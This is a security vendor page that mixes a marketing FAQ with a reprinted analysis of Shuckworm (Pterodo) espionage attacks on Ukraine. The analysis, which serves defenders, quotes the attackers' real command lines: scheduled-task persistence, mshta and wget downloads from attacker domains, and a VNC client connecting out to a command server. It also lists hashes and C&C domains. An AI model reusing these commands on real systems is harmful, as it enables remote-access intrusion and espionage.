Frequently Asked Questions

Shuckworm Attack Analysis & Threat Context

What is Shuckworm and how does it conduct cyber-espionage attacks?

Shuckworm (also known as Pterodo) is a threat actor group known for cyber-espionage campaigns, particularly targeting Ukraine. Their attacks typically begin with a malicious Word document that, when opened, executes a custom VBS backdoor. This backdoor downloads and executes additional payloads, establishes persistence through scheduled tasks, and leverages tools like mshta.exe to bypass security controls. The group uses multiple variants of their backdoor, scheduled tasks for persistence, and ultimately deploys remote administration tools such as UltraVNC to maintain access and exfiltrate data. Note: Cymulate does not provide attribution services; for ongoing threat intelligence, refer to the original analysis and Cymulate's research blog.

What persistence techniques did Shuckworm use in the Ukraine attack?

Shuckworm established persistence by creating multiple scheduled tasks that executed malicious VBS scripts at regular intervals (e.g., every 10, 12, or 15 minutes). These scripts would download and run additional payloads, ensuring continued access even after system reboots. The attackers also used scheduled tasks to launch remote administration tools and maintain command-and-control connectivity. Note: These techniques are specific to the documented attack and may vary in other campaigns.

What was the final payload used by Shuckworm in this campaign?

The final payload identified in the Shuckworm attack was an UltraVNC client, a remote administration tool. This payload was dropped and executed to establish a persistent connection to a remote command-and-control server (e.g., mucoris.ru:5612), enabling the attackers to control the compromised system remotely. Note: The use of legitimate remote administration tools for malicious purposes is a common tactic among advanced threat actors.

Features & Capabilities

How does Cymulate help organizations defend against threats like Shuckworm?

Cymulate provides an AI-powered cyber defense engineering platform that enables organizations to continuously validate their security controls against real-world threats, including advanced persistent threats (APTs) like Shuckworm. Key features include exposure validation, automated mitigation, and a comprehensive threat library that simulates malware, phishing, ransomware, and more. Cymulate's closed-loop system (prove → prioritize → improve → re-prove) ensures that defenses are always tested and improved. Note: Cymulate does not offer incident response or attribution services; it focuses on proactive validation and risk reduction. Detailed limitations not publicly documented; ask sales for specifics.

Which types of threats can Cymulate validate?

Cymulate can validate a wide range of threats, including malware, phishing, ransomware, advanced persistent threats (APTs), insider threats, network attacks, and web application attacks. The platform is designed to simulate diverse attack scenarios to ensure comprehensive security validation. Note: Cymulate does not replace endpoint protection or SIEM solutions; it validates their effectiveness. Detailed limitations not publicly documented; ask sales for specifics.

What is Cymulate's Immediate Threats Module and how does it benefit users?

The Immediate Threats Module in Cymulate is updated rapidly to reflect new attacks. Users can quickly assess their IT estate for risks posed by emerging threats and implement remedial actions promptly. A Penetration Tester noted: “I am particularly enamored with the immediate threats module and how quickly this gets updated. In short if an attack is new, you can quickly assess your IT estate for how much of a risk is posed to you and implement remedial action quickly.” Note: The module does not provide forensic analysis; it is designed for rapid risk assessment. Source

What integrations does Cymulate support?

Cymulate integrates with over 50 security tools, including SIEM platforms (Azure Sentinel, Splunk, CrowdStrike Falcon LogScale), EDR and anti-malware solutions (CrowdStrike Falcon, Carbon Black EDR, Cisco Secure Endpoint), cloud security tools (AWS GuardDuty, Check Point CloudGuard), web gateways (Cisco Umbrella), vulnerability management (Rapid7 InsightVM), and others such as Microsoft Defender, Palo Alto Networks, Wiz, and Zscaler. For a full list, see the technology alliances and integrations page. Note: Not all integrations may be available in every package; check with Cymulate for compatibility details.

Use Cases & Business Impact

Who can benefit from using Cymulate?

Cymulate is designed for organizations of all sizes and industries seeking to proactively manage and validate their cybersecurity posture. Key roles include CISOs, VP Security, SecOps Directors, SOC Leaders, Detection Engineers, Red Teams, Vulnerability Management Teams, GRC/Compliance Teams, and IT/Cloud teams. The platform is especially valuable for companies needing to prioritize high-risk issues, optimize resource allocation, and communicate cybersecurity value to executives. Note: Organizations requiring incident response or managed detection services should consider complementary solutions. Source

What business impact can customers expect from using Cymulate?

Organizations using Cymulate report an average 30% increase in threat prevention, 90% improvement in threat detection, 52% reduction in critical exposures, and a 60% boost in operational efficiency. Threat validation is 40X faster than manual methods, and customers have achieved measurable ROI, such as an 81% reduction in cyber risk within four months (see the Hertz Israel case study). Note: Results may vary based on organizational maturity and implementation scope. Source

What are some real-world case studies demonstrating Cymulate's effectiveness?

Examples include:

Note: Outcomes depend on the organization's baseline and engagement level.

Implementation & Ease of Use

How long does it take to implement Cymulate and how easy is it to start?

Cymulate is designed for rapid deployment, operating in agentless mode without the need for additional hardware or complex configurations. Users can start running simulations almost immediately, with only basic infrastructure and internet connectivity required. The platform features an intuitive dashboard and navigation, and customers have access to email and real-time chat support, as well as educational resources like webinars and e-books. As Raphael Ferreira, Cybersecurity Manager, stated: “Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture.” Note: Large or highly segmented environments may require additional integration steps. Source

What do customers say about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive design and ease of use. Testimonials highlight that the platform is easy to implement, user-friendly for both technical and non-technical users, and effective for communicating risks to management. For example, Markus Flatscher, Senior Security Manager, noted that Cymulate helps internal stakeholders understand the importance of cybersecurity. Note: Some advanced features may require additional training for optimal use. Source

Security & Compliance

What security and compliance certifications does Cymulate have?

Cymulate holds SOC2 Type II certification, ISO 27001:2013 (Information Security Management System), ISO 27701 (Privacy Information Management), ISO 27017 (Cloud Security), and CSA STAR Level 1 certification. These attest to Cymulate's adherence to rigorous security, privacy, and cloud service standards. Note: Certification scope and coverage may vary; see the security certifications section for details.

How does Cymulate protect customer data?

Cymulate employs 2-Factor Authentication (2FA), Single Sign-On (SSO), role-based access controls (RBAC), and encrypts data both in transit and at rest. The platform follows strict secure development life cycle procedures, including code review and vulnerability scanning, and is overseen by a Data Protection Officer (DPO) and Chief Information Security Officer (CISO). Note: Customers are responsible for configuring access controls within their own environments. Source

Pricing & Plans

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model that is customized to fit the unique needs of each organization. Pricing depends on the package selected, number of assets covered, and chosen scenarios and features. For a tailored quote, organizations can schedule a demo with the Cymulate team. Note: Exact pricing is not published; contact Cymulate for a detailed proposal. Schedule a demo

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers AI-driven remediation guidance, a daily-updated attack scenario library, and an AI Copilot for automated test creation. It provides continuous, automated testing and is recognized as a Momentum Leader by G2 and a Customer’s Choice in the 2025 Gartner Peer Insights Voice of the Customer for Adversarial Exposure Validation. AttackIQ may offer different integrations or workflows. Choose Cymulate if you need rapid, AI-powered validation and remediation; choose AttackIQ if you require features not listed here. Note: Cymulate does not provide all the integrations or reporting formats available in AttackIQ. Read more

How does Cymulate compare to Mandiant Security Validation?

Cymulate emphasizes AI and automation, rapid deployment, easy integrations, and an intuitive dashboard. It provides a comprehensive attack library with daily updates and actionable remediation guidance. Mandiant Security Validation may offer deeper integration with Mandiant threat intelligence and incident response services. Choose Cymulate for fast, automated exposure validation; choose Mandiant if you need integrated incident response. Note: Cymulate does not provide managed incident response services. Read more

How does Cymulate compare to Pentera?

Cymulate combines breach simulation, automated red teaming, and deep security control integrations. It allows custom attack chains from a library of over 100,000 actions and delivers daily threat updates. Pentera may focus more on automated penetration testing. Choose Cymulate for continuous exposure validation and custom offensive testing; choose Pentera for automated pen testing. Note: Cymulate does not replace full-scope manual penetration testing. Read more

How does Cymulate compare to Picus Security?

Cymulate delivers full kill-chain coverage, including cloud control validation, and features no-code workflows with a large attack action library. It provides automated, continuous testing and daily threat updates. Picus Security may offer different reporting or integration options. Choose Cymulate for broad coverage and ease of use; choose Picus if you need features not listed here. Note: Cymulate may not support all environments or integrations available in Picus. Read more

How does Cymulate compare to SafeBreach?

Cymulate leverages AI and automation for exposure validation, offers the industry’s largest attack library with daily updates, and provides intuitive dashboards and centralized validation. SafeBreach may offer different approaches to attack simulation. Choose Cymulate for rapid validation and actionable reporting; choose SafeBreach if you require features not listed here. Note: Cymulate may not support all attack simulation scenarios available in SafeBreach. Read more

Technical Documentation & Support

Where can I find technical documentation and resources for Cymulate?

Cymulate provides a resource hub with industry reports, whitepapers, case studies, and technical guides. Notable resources include the Threat Studio data sheet and the Detection Engineering Automation Guide. For all resources, visit the resource hub. Note: Some resources may require registration for access.

How can I stay updated on the latest threats and Cymulate research?

Stay informed about the latest cybersecurity threats and research by visiting the Cymulate blog. Note: Blog content is updated regularly but may not cover all emerging threats in real time.

New: Cymulate Cowork for Agentic Cyber Defense Engineering
Learn More
New Bitsight Integration: Turn Threat Intelligence into Validated Security
Learn More
Introducing Cymulate Vero AI for Agentic Cyber Defense Engineering
Learn More
New Case Study: How a Financial Authority Validates Cyber Resilience
Learn More

Shuckworm Continues Cyber-Espionage Attacks Against Ukraine

February 1, 2022

At 08:48 (local-time), a suspicious Word document is opened on the machine. Just five minutes after the document is opened, a suspicious command is also executed to launch a malicious VBS file (depended.lnk). This file is a known custom backdoor leveraged by Shuckworm (aka Pterodo). wscript.exe CSIDL_PROFILEsearchesdepended.lnk //e:VBScript //b The backdoor is used to download and execute CSIDL_PROFILEsearchesdepended.exe (94a78d5dce553832d61b59e0dda9ef2c33c10634ba4af3acb7fb7cf43be17a5b) from hxxp://92.242.62.131/wordpress.php?is=[REDACTED]. Two additional VBS scripts are observed being executed via depended.exe: "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdataroamingreflect.rar //e:VBScript //b "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltempdeep-thoughted. //e:VBScript //b A scheduled task is then created to likely ensure persistence between system reboots and to execute the dropped script. This ensures the VBS file deep-thoughted.ppt is executed every 10 minutes: SCHTASKS /CREATE /sc minute /mo 10 /tn "deep-thoughted" /tr "wscript.exe " CSIDL_COMMON_PICTURESdeep-thoughted.ppt //e:VBScript //b" /F Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. "CSIDL_SYSTEMcmd.exe" /c CSIDL_SYSTEMmshta.exe hxxp://fiordan.ru/FILM.html /f id=[REDACTED] At the same time, a new variant of Pterodo is installed via depended.exe. Similarly to before, two additional scheduled tasks are created: "CSIDL_SYSTEMschtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b " /F" "CSIDL_SYSTEMschtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEOwebmedia.m3u //e:VBScript //b " /F" The attackers continue to install variants of their backdoor and execute commands via scripts to ensure persistence: "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltemp22333.docx //e:VBScript //b "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltemp9140.d //e:VBScript //b wscript.exe CSIDL_COMMON_MUSICtvplaylist.mov //e:VBScript //b schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe C:Userso.korolAppDataRoamingbatterybattery.dat //e:VBScript //b" "CSIDL_SYSTEMcmd.exe" /c CSIDL_PROFILEappdataroamingbatterybattery.cmd Directly after this, it appears the attackers test connectivity to a new C&C server via ping.exe: CSIDL_SYSTEMcmd.exe /c ping -n 1 arianat.ru Once the connection is confirmed to be active, the attackers proceed to download another variant of their Pterodo backdoor and begin using the new C&C to download additional scripts and tools, as well as creating scheduled tasks to run every few minutes. "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltemp12382. //e:VBScript //b "CSIDL_SYSTEMcmd.exe" /c CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id= CSIDL_SYSTEMmshta.exe hxxp://avirona.ru/7-ZIP.html /f id= "CSIDL_SYSTEMschtasks.exe" /CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe " CSIDL_COMMON_MUSICmediatv.mov //e:VBScript //b " /F" "CSIDL_SYSTEMschtasks.exe" /CREATE /sc minute /mo 12 /tn "VideoHostName" /tr "wscript.exe " CSIDL_COMMON_VIDEOvideotv.m3u //e:VBScript //b " /F" At this point, the attackers cease activity. However, analysts continue to see commands being executed from the scheduled tasks for the remainder of July 14. The attackers, then, return, and several additional variants of Pterodo are executed via CSIDL_COMMON_VIDEOplaneta.exe (1ea3881d5d03214d6b7e37fb7b10221ef51782080a24cc3e275f42a3c1ea99c1). "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltemp32440.docx //e:VBScript //b "CSIDL_SYSTEMwscript.exe" CSIDL_PROFILEappdatalocaltemp20507.d //e:VBScript //b The attackers are then observed executing commands via planeta.exe: CSIDL_SYSTEMcmd.exe /c ""CSIDL_PROFILEappdatalocaltemp7zsfx000."" "" "CSIDL_SYSTEMcmd.exe" /c ipconfig /flushdns The above flushdns command may indicate that the attackers have updated the DNS records for their C&Cs, as analysts observed some of their tools use hard-coded domains. In this particular instance, the flushdns command was executed shortly before the attackers attempted to install additional backdoors that leveraged the same C&C. Later, another variant of Pterodo (deep-sided.fly) was executed and was used to download and execute a new file called deerskin.exe (ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29). This file is a dropper for a VNC client. When executed, it pings google DNS (8.8.8.8) to test internet connectivity, then proceeds to drop a VNC client and establishes a connection to a remote C&C server controlled by the attackers: "%USERPROFILE%ContactsDriversHood.exe" -autoreconnect -id:2097 -connect mucoris.ru:5612 Two such files have been identified that perform the same actions: 1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f ad1f796b3590fcee4aeecb321e45481cac5bc022500da2bdc79f768d08081a29 This VNC client appears to be the ultimate payload for this attack. During the course of this incident, specifically post VNC client installation, a number of documents were opened from various locations on the compromised machine. It is unclear if this was legitimate user activity or the activity of the attackers attempting to collect and exfiltrate sensitive information. Titles of the documents accessed ranged from job descriptions to sensitive information pertaining to the targeted organization. Thorough investigations uncovered a total of seven files used by Shuckworm in recent attacks. All seven files are 7-zip SFX self-extracting binaries, a format used previously in Shuckworm attacks. descend.exe Upon execution, the file named descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) drops a VBS file which, in turn, drops a second VBS file in the following locations: %USERPROFILE%Downloadsdeerbrook.ppt %PUBLIC%Picturesdeerbrook.ppt It then creates the following task: SCHTASKS /CREATE /sc minute /mo 11 /tn "deerbrook" /tr "wscript.exe 'deerbrook.ppt' //e:VBScript //b" /F The file deerbrook.ppt (b46e872375b3c910fb589ab75bf130f7e276c4bcd913705a140ac76d9d373c9e) VBS file contacts a command-and-control (C&C) server at deep-pitched.enarto.ru. If the C&C server is available, a HTTP POST request is sent to download a payload, which is saved in the %USERPROFILE% folder as deep-sunken.tmp then renamed to deep-sunken.exe and executed. The binary is then deleted. deep-sunken.exe Upon execution, the file deep-sunken.exe (02c41bddd087522ce60f9376e499dcee6259853dcb50ddad70cb3ef8dd77c200) drops the following files on the compromised computer: %APPDATA%babybaby.cmd %APPDATA%babybaby.dat %APPDATA%babybasement.exe (wget binary) %APPDATA%babyvb_baby.vbs It then creates the following task: schtasks /Create /SC MINUTE /MO 15 /F /tn BackgroundConfigSurveyor /tr "wscript.exe [%APPDATA%]babybaby.dat" //e:VBScript //b It then connects to a C&C server (arianat.ru) to download another payload using wget: basement.exe --user-agent="Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64::[VICTIM_ID]::/.beagle/." -q -b -c -t 2 "hxxp://arianat.ru/baby.php" -P "[%APPDATA%]baby" The baby.dat file is a VBS file that executes baby.cmd, which then downloads and executes the payload from the C&C server. The vb_baby.vbs file renames the downloaded payload from baby.php to backed.exe. The downloaded payload (backed.exe) could not be retrieved. However, the following files were also obtained during investigation: z4z05jn4.egf.exe The file z4z05jn4.egf.exe (fd9a9dd9c73088d1ffdea85540ee671d8abb6b5ab37d66a760b2350951c784d0) is similar to the previous file (deep-sunken.exe) but with different folders, file names, and C&C server (iruto.ru). defiant.exe Once executed, the file defiant.exe (a20e38bacc979a5aa18f1954df1a2c0558ba23cdc1503af0ad1021c330f1e455) drops a VBS file in the following locations: %TEMP%\deep-versed.nls %PUBLICPicturesdeep-versed.nls It then creates the following task: SCHTASKS /CREATE /sc minute /mo 12 /tn "deep-versed" /tr "wscript.exe "[%PUBLIC%]\Pictures\deep-versed.nls" //e:VBScript //b" /F The dropped file deep-versed.nls (817901df616c77dd1e5694e3d75aebb3a52464c23a06820517108c74edd07fbc) downloads a payload from a C&C server (deep-toned.chehalo.ru) and saves it as deep-green.exe in the following location: %PUBLIC%Downloads deep-green.exe The file deep-green.exe (1ddc9b873fe4f4c8cf8978b6b1bb0e4d9dc07e60ba188ac6a5ad8f162d2a1e8f) contains an UltraVNC binary, which upon execution connects to a repeater (mucoris.ru:5612) using the following command line: -autoreconnect -id:%RANDOM% -connect mucoris.ru:5612 UltraVNC is an open-source remote-administration/remote-desktop-software utility. deep-green.exe A second file named deep-green.exe (f6c56a51c1f0139036e80a517a6634d4d87d05cce17c4ca5adc1055b42bf03aa) contain a Process Explorer (procexp) binary. Process Explorer is a freeware task manager and system monitor for Microsoft Windows. deep-green.exe A third file called deep-green.exe (de5a53a3b75e3e730755af09e3cacb7e6d171fc9b1853a7200e5dfb9044ab20a) is similar to descend.exe (0d4b8e244f19a009cee50252f81da4a2f481da9ddb9b204ef61448d56340c137) just with different file names and C&C server (deer-lick.chehalo.ru). deep-green.exe The fourth and final file named deep-green.exe (d15a7e69769f4727f7b522995a17a0206ac9450cfb0dfe1fc98fd32272ee5ba7) drops a VBS file in the following location: %PUBLIC%Music It then creates the following task: "/CREATE /sc minute /mo 12 /tn "MediaConverter" /tr "wscript.exe "C:\Users\Public\Music\MediaConvertor.dat" //e:VBScript //b " /F" The MediaConvertor.dat file searches for removable drives and creates a .lnk file with the following command: mshta.exe hxxp://PLAZMA.VIBER.ontroma.ru/PLAZMA.html /f id=January